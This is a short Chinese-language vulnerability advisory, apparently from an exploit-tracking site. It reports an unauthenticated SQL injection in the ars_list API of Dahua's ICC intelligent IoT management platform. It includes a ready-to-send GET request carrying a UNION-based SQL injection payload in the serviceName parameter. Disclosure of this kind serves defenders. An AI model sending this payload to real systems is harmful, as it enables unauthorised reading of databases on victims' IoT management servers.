大华ICC智能物联综合管理平台 ars_list 存在SQL注入漏洞

Description

大华ICC智能物联综合管理平台 ars_list 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用此漏洞获取数据库中的信息。

PoC

GET /evo-apigw/evo-arsm/1.0.0/ars/list?serviceName='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,md5('857732e0f6'),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities